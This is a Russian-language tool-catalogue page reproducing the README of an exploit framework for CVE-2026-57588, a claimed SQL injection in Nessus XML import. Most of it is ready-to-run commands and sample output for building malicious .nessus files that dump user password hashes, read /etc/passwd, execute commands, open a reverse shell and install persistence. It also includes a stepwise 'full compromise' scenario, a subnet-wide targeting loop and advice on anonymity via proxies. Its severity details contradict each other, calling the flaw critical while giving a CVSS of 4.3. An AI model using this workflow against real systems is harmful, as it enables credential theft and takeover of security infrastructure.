Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/cerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed Teaming
Безопасность Баз Данных
GitHubcerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc

CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

Репозиторий
111 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

PoC для CVE-2026-57588 - SQL-инъекция в импорте XML Nessus 10.12.0. Генерирует вредоносные .nessus файлы для перечисления баз данных, эксфильтрации учетных данных и тестирования time-based blind injection. Для авторизованных исследований безопасности. Автор: Sudeepa Wanigarathna. Исправлено в 10.12.1.

Поделиться

🛡️ CVE-2026-57588 - Фреймворк эксплуатации SQL-инъекции Nessus

Security Research CVE Version Python License


📋 Содержание

  • Обзор
  • Детали уязвимости
  • Возможности
  • Установка
  • Быстрый старт
  • Примеры использования
  • Типы пейлоадов
  • Расширенные сценарии
  • Отчетность
  • Устранение неполадок
  • Соображения безопасности
  • Лицензия

  • 🔍 Обзор

    CVE-2026-57588 — критическая уязвимость SQL-инъекции, обнаруженная в Tenable Nessus версий 10.12.0 и более ранних. Уязвимость находится в механизме разбора XML при импорте файлов результатов сканирования .nessus, позволяя аутентифицированным пользователям с правами импорта выполнять произвольные SQL-запросы к бэкенд-базе данных PostgreSQL.


    ⚠️ Детали уязвимости

    ПараметрЗначение
    CVE IDCVE-2026-57588
    Тип уязвимостиSQL-инъекция
    Затронутые продуктыTenable Nessus 10.12.0 и более ранние
    Исправленная версияNessus 10.12.1 и новее
    Оценка CVSS4.3 (Средняя)
    Вектор атакиСеть
    Сложность атакиНизкая
    Необходимые привилегииАутентифицированный (права импорта)
    Взаимодействие пользователяТребуется (социальная инженерия)
    ВоздействиеИзвлечение данных, удаленное выполнение кода

    🔬 Технические детали

    Уязвимость существует из-за недостаточной санитизации значений XML-тегов перед их включением в SQL-запросы в процессе импорта. Злоумышленник может создать файл .nessus, содержащий специально сформированные пейлоады SQL-инъекций в таких XML-тегах, как:

    • hostname
    • fqdn
    • os
    • system-type
    • mac-address
    • netbios-name

    Когда привилегированный пользователь импортирует вредоносный файл, несанитизированные значения выполняются против бэкенда PostgreSQL, что позволяет:

    • Перечисление базы данных
    • Извлечение данных
    • Выполнение команд
    • Доступ к файловой системе
    • Установка персистентности

    ✨ Возможности

    Нажмите, чтобы развернуть список возможностей

    🎯 Управление пейлоадами

    • 13+ типов пейлоадов, классифицированных по назначению
    • Шаблонная генерация пейлоадов
    • Создание и валидация пользовательских пейлоадов
    • Валидация параметров и проверка синтаксиса
    • Проверка синтаксиса SQL

    🚀 Возможности эксплуатации

    • Многоэтапная эксплуатация с параллельным выполнением
    • Снятие отпечатков и перечисление базы данных
    • Извлечение данных с настраиваемым выбором таблиц/столбцов
    • Выполнение команд на целевой системе
    • Доступ к файловой системе и чтение файлов
    • Обратная оболочка с интерактивной сессией
    • Механизмы установки персистентности
    • Слепая SQL-инъекция на основе времени
    • Слепая SQL-инъекция на основе булевых значений
    • SQL-инъекция на основе ошибок
    • Стековые запросы для продвинутой эксплуатации
    • Внеполосное извлечение данных через DNS

    📊 Отчетность и логирование

    • HTML-отчеты с профессиональным стилем
    • Markdown-отчеты для документации
    • JSON-отчеты для автоматизации
    • Текстовые отчеты для быстрого просмотра
    • Ротация логов с несколькими уровнями
    • Детальная статистика выполнения
    • Хеширование файлов для проверки целостности

    🛠️ Расширенные возможности

    • Параллельное выполнение с настраиваемым числом задач
    • Поддержка прокси для скрытных операций
    • Обработка сертификатов SSL/TLS
    • Валидация XML и проверка схемы
    • Интерактивный режим для живой эксплуатации
    • Механизм повторных попыток для надежности
    • Настройка тайм-аута для медленных соединений

    📦 Профессиональный инструментарий

    • Структура CLI на основе подкоманд
    • Подробный и тихий режимы
    • Цветной вывод в терминале
    • Индикаторы прогресса для длительных задач
    • Поддержка Docker для контейнеризированного тестирования
    • Кроссплатформенная совместимость (Linux, Windows, macOS)

    📦 Установка

    🐍 Предварительные требования

    • Python 3.7 или выше
    • pip (менеджер пакетов Python)
    • Git (опционально, для клонирования)

    🔧 Быстрая установка

    root@kitploit:~
    # Клонировать репозиторий
    git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    
    # Создать и активировать виртуальное окружение
    python3 -m venv venv
    source venv/bin/activate  # На Windows: venv\Scripts\activate
    
    # Установить зависимости
    pip install -r requirements.txt
    
    # Проверить установку
    python3 exploit.py --version
    

    🐳 Установка через Docker

    root@kitploit:~
    # Собрать Docker-образ
    docker build -t nessus-exploit .
    
    # Запустить инструмент
    docker run -it --rm nessus-exploit generate -u https://test.com -p enum
    

    📦 Установка пакета

    root@kitploit:~
    # Установить как пакет
    pip install -e .
    
    # Теперь можно запускать из любой директории
    nessus-exploit generate -u https://test.com -p enum
    

    🚀 Быстрый старт

    Базовое использование

    root@kitploit:~
    # Сгенерировать базовый эксплойт для перечисления
    python3 exploit.py generate -u https://test.com -p enum
    
    # Сгенерировать продвинутый многоэтапный эксплойт
    python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus
    
    # Извлечь данные из базы данных
    python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
    

    Справка по командам

    root@kitploit:~
    # Показать общую справку
    python3 exploit.py --help
    
    # Показать справку по команде generate
    python3 exploit.py generate --help
    
    # Список всех доступных пейлоадов
    python3 exploit.py list
    

    💡 Примеры использования

    1. Базовое перечисление

    root@kitploit:~
    python3 exploit.py generate -u https://test.com -p enum
    
    Ожидаемый вывод
    root@kitploit:~
    [2026-07-22 10:15:23] [INFO] [*] Начало эксплуатации против https://test.com
    [2026-07-22 10:15:23] [INFO] [*] Сессия: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
    [2026-07-22 10:15:23] [INFO] [*] Пейлоад: enum
    [2026-07-22 10:15:23] [INFO] [*] Выполнение этапа: fingerprint
    [2026-07-22 10:15:24] [INFO] [+] Сгенерирован XML: exploit_20260722_fingerprint_101523.nessus (3847 байт)
    [2026-07-22 10:15:24] [INFO] [*] Выполнение этапа: schema_dump
    [2026-07-22 10:15:25] [INFO] [+] Сгенерирован XML: exploit_20260722_schema_dump_101524.nessus (4213 байт)
    [2026-07-22 10:15:25] [INFO] [+] Эксплуатация завершена! Длительность: 2.15с
    
    ============================================================
    СВОДКА ЭКСПЛУАТАЦИИ
    ============================================================
    Цель: https://test.com
    Статус: УСПЕХ
    Длительность: 2.15с
    Сгенерировано файлов: 3
    Сгенерировано отчетов: 3
    ============================================================
    

    2. Продвинутая многоэтапная эксплуатация

    root@kitploit:~
    python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v
    

    3. Извлечение данных

    root@kitploit:~
    # Извлечь учетные данные пользователей
    python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
    
    # Извлечь с пользовательскими столбцами
    python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status
    

    4. Обратная оболочка

    root@kitploit:~
    # Запустить слушатель и сгенерировать эксплойт
    python3 exploit.py generate -u https://test.com -p shell -lp 4444 -o shell.nessus
    

    5. Выполнение команд

    root@kitploit:~
    # Выполнить базовые команды
    python3 exploit.py generate -u https://test.com -p exec --command "whoami && id && uname -a"
    
    # Выполнить сложные команды
    python3 exploit.py generate -u https://test.com -p exec --command "ps aux | grep nessus"
    

    6. Чтение файлов

    root@kitploit:~
    # Чтение системных файлов
    python3 exploit.py generate -u https://test.com -p file -f /etc/passwd
    
    # Чтение логов приложения
    python3 exploit.py generate -u https://test.com -p file -f /var/log/nessus/nessusd.log
    

    7. Слепая инъекция на основе времени

    root@kitploit:~
    # Задержка 5 секунд
    python3 exploit.py generate -u https://test.com -p sleep -s 5
    
    # Задержка 30 секунд для тяжелых тестов
    python3 exploit.py generate -u https://test.com -p sleep -s 30
    

    8. С поддержкой прокси

    root@kitploit:~
    # HTTP прокси
    python3 exploit.py generate -u https://test.com -p advanced --proxy http://127.0.0.1:8080
    
    # HTTPS прокси с аутентификацией
    python3 exploit.py generate -u https://test.com -p advanced --proxy https://user:[email protected]:8080
    

    9. Параллельное выполнение

    root@kitploit:~
    # Запустить с 8 параллельными задачами
    python3 exploit.py generate -u https://test.com -p advanced --jobs 8
    
    # С пользовательским тайм-аутом и повторными попытками
    python3 exploit.py generate -u https://test.com -p advanced --jobs 4 --timeout 60 --retries 5
    

    10. Подробный и тихий режимы

    root@kitploit:~
    # Подробный режим (детальный вывод)
    python3 exploit.py generate -u https://test.com -p advanced -v --log-file debug.log
    
    # Тихий режим (минимальный вывод)
    python3 exploit.py generate -u https://test.com -p advanced -q
    

    📚 Типы пейлоадов

    Категория: FINGERPRINTING

    ПейлоадОписаниеПараметры
    fingerprintСнятие отпечатков базы данныхНет

    Категория: UNION

    ПейлоадОписаниеПараметры
    schema_dumpДамп схемы базы данныхНет
    data_exfilИзвлечение данных таблицыtable, columns

    Категория: TIMING

    ПейлоадОписаниеПараметры
    time_basedСлепая инъекция на основе времениdelay
    boolean_blindСлепая на основе булевых значенийcondition, delay

    Категория: FILE_ACCESS

    ПейлоадОписаниеПараметры
    file_readЧтение системных файловpath, offset, length

    Категория: COMMAND_EXEC

    ПейлоадОписаниеПараметры
    command_execВыполнение системных командcommand

    Категория: REVERSE_SHELL

    ПейлоадОписаниеПараметры
    reverse_shellУстановка обратной оболочкиhost, port

    Категория: PERSISTENCE

    ПейлоадОписаниеПараметры
    persistenceУстановка персистентностиНет

    Категория: ERROR_BASED

    ПейлоадОписаниеПараметры
    error_basedИнъекция на основе ошибокquery

    Категория: STACKED

    ПейлоадОписаниеПараметры
    stacked_queriesСтековые запросыquery

    Категория: OUT_OF_BAND

    ПейлоадОписаниеПараметры
    oob_dnsDNS-эксфильтрацияhost, data

    🎯 Расширенные сценарии

    Сценарий 1: Полный рабочий процесс компрометации

    root@kitploit:~
    # Шаг 1: Перечислить базу данных
    python3 exploit.py generate -u https://test.com -p enum -v
    
    # Шаг 2: Извлечь конфиденциальные данные
    python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
    
    # Шаг 3: Установить персистентность
    python3 exploit.py generate -u https://test.com -p persist
    
    # Шаг 4: Настроить обратную оболочку
    python3 exploit.py generate -u https://test.com -p shell -lp 4444
    

    Сценарий 2: Скрытные операции

    root@kitploit:~
    # Использование прокси и тихого режима
    python3 exploit.py generate -u https://test.com -p advanced \
        --proxy http://127.0.0.1:8080 \
        --no-ssl-verify \
        -q \
        -o stealth_scan.nessus
    

    Сценарий 3: Автоматизированный конвейер тестирования

    root@kitploit:~
    #!/bin/bash
    # auto_exploit.sh - Автоматизированный скрипт эксплуатации
    
    TARGET="https://test.com"
    OUTPUT_DIR="./results_$(date +%Y%m%d_%H%M%S)"
    mkdir -p $OUTPUT_DIR
    
    # Запустить все пейлоады
    for payload in enum dump shell persist; do
        echo "[*] Выполнение пейлоада: $payload"
        python3 exploit.py generate -u $TARGET -p $payload -o "$OUTPUT_DIR/${payload}_scan.nessus" -q
    done
    
    # Сгенерировать комплексный отчет
    python3 exploit.py report -i "$OUTPUT_DIR" -o "$OUTPUT_DIR/final_report"
    

    Сценарий 4: Оценка безопасности предприятия

    root@kitploit:~
    # Оценка по всей сети
    for target in $(nmap -p 8834 --open 192.168.1.0/24 | grep "Nessus" | awk '{print $5}'); do
        echo "[*] Тестирование: $target"
        python3 exploit.py generate -u "https://$target" -p advanced -o "scan_${target}.nessus" -q
    done
    

    Сценарий 5: Сбор доказательств

    root@kitploit:~
    # Собрать комплексные доказательства
    python3 exploit.py generate -u https://test.com -p advanced \
        --file /etc/hosts \
        --command "systemctl status nessusd" \
        --table nessus_users \
        --columns username,password_hash,email,last_login \
        -v \
        --log-file evidence.log
    

    📊 Отчетность

    Доступные форматы отчетов

    ФорматОписаниеИспользование
    HTMLПрофессиональный HTML-отчет со стилями--format html
    MarkdownФормат Markdown для документации--format markdown
    JSONJSON для автоматизации--format json
    TextОбычный текст для быстрого просмотра--format text

    Создание отчетов

    root@kitploit:~
    # Создать все форматы отчетов
    python3 exploit.py report -i results.json -o report
    
    # Создать только HTML-отчет
    python3 exploit.py report -i results.json -o report.html --format html
    
    # Создать Markdown-отчет
    python3 exploit.py report -i results.json -o report.md --format markdown
    

    Содержимое отчета

    • Информация о цели
    • ID сессии и тип пейлоада
    • Статистика выполнения
    • Список сгенерированных файлов
    • Хеши файлов для целостности
    • Логи ошибок (если есть)
    • Отказ от ответственности и предупреждения

    🔧 Устранение неполадок

    Частые проблемы и решения

    Проблема 1: Ошибки соединения
    root@kitploit:~
    # Ошибка: Соединение отклонено
    # Решение: Проверить, запущен ли Nessus и доступен ли порт
    python3 exploit.py generate -u https://test.com:8834 -p enum
    
    # Ошибка: Не удалось проверить SSL-сертификат
    # Решение: Отключить проверку SSL
    python3 exploit.py generate -u https://test.com -p enum --no-ssl-verify
    
    Проблема 2: Ошибки валидации XML
    root@kitploit:~
    # Ошибка: Неверная структура XML
    # Решение: Отключить валидацию XML
    python3 exploit.py generate -u https://test.com -p enum --no-validate
    
    Проблема 3: Ошибки пейлоадов
    root@kitploit:~
    # Ошибка: Отсутствует обязательный параметр
    # Решение: Проверить требования пейлоада
    python3 exploit.py validate -p command_exec
    
    # Затем указать необходимые параметры
    python3 exploit.py generate -u https://test.com -p exec --command "whoami"
    
    Проблема 4: Отказано в доступе
    root@kitploit:~
    # Ошибка: Невозможно записать файлы
    # Решение: Проверить права на директорию
    chmod 755 ./outputs/
    python3 exploit.py generate -u https://test.com -p enum -o ./outputs/scan.nessus
    
    Проблема 5: Проблемы с тайм-аутом
    root@kitploit:~
    # Ошибка: Операция превысила тайм-аут
    # Решение: Увеличить тайм-аут
    python3 exploit.py generate -u https://test.com -p advanced --timeout 120
    
    # Или использовать повторные попытки
    python3 exploit.py generate -u https://test.com -p advanced --retries 5
    

    🔐 Соображения безопасности

    ⚠️ Важные предупреждения

    1. Соблюдение закона: Используйте только на системах, которые вам принадлежат, или при наличии явного письменного разрешения на тестирование
    2. Защита данных: Обращайтесь с извлеченными учетными данными и данными с особой осторожностью
    3. Изолированная среда: Всегда тестируйте в изолированных лабораторных средах
    4. Резервное копирование: Всегда делайте резервные копии баз данных перед тестированием
    5. Восстановление: Восстанавливайте системы в исходное состояние после тестирования
    6. Документация: Документируйте все действия по тестированию для соблюдения требований

    ✅ Лучшие практики

    1. Используйте выделенные тестовые учетные записи
    2. Ведите подробные журналы всех действий
    3. Используйте VPN/прокси для анонимности при тестировании сторонних систем
    4. Следуйте правилам ответственного раскрытия информации
    5. Обучите свою команду об этой уязвимости

    📝 Лицензия

    Этот проект лицензирован по лицензии MIT - подробности см. в файле LICENSE.


    🤝 Внесение вклада

    Вклад приветствуется! Не стесняйтесь отправлять Pull Request.

    Настройка разработки

    root@kitploit:~
    # Клонировать репозиторий
    git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    
    # Установить зависимости для разработки
    pip install -r requirements-dev.txt
    
    # Запустить тесты
    pytest
    
    # Форматировать код
    black exploit.py
    
    # Проверить стиль кода
    flake8 exploit.py
    

    📞 Поддержка

    Документация

    • Официальное уведомление безопасности Tenable
    • Запись в базе данных CVE
    • Документация Nessus

    Контакты

    • Автор: Sudeepa Wanigarathna
    • Электронная почта: [email protected]
    • GitHub: CerberusMrXi

    📄 Журнал изменений

    Версия 1.0.0 (2026-07-22)

    Первый выпуск

    • ✅ Комплексный фреймворк эксплуатации
    • ✅ 13 типов пейлоадов, классифицированных по назначению
    • ✅ Многоэтапная эксплуатация с параллельным выполнением
    • ✅ Валидация XML и проверка схемы
    • ✅ Несколько форматов отчетов (HTML, Markdown, JSON, Text)
    • ✅ Автоматическое хеширование файлов и проверка целостности
    • ✅ Профессиональное логирование с ротацией
    • ✅ Поддержка прокси для скрытных операций
    • ✅ Обратная оболочка с интерактивной сессией
    • ✅ Механизмы персистентности
    • ✅ Выполнение команд и чтение файлов
    • ✅ Слепая инъекция на основе времени и булевых значений
    • ✅ Инъекция на основе ошибок и стековых запросов
    • ✅ Внеполосная DNS-эксфильтрация
    • ✅ Поддержка Docker
    • ✅ Кроссплатформенная совместимость

    ⬆ Наверх


    ⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Этот инструмент предназначен ТОЛЬКО для ОБРАЗОВАТЕЛЬНОГО и АВТОРИЗОВАННОГО тестирования безопасности. Несанкционированное использование является НЕЗАКОННЫМ. Автор НЕ НЕСЕТ ОТВЕТСТВЕННОСТИ за неправильное использование.

    Скачать инструмент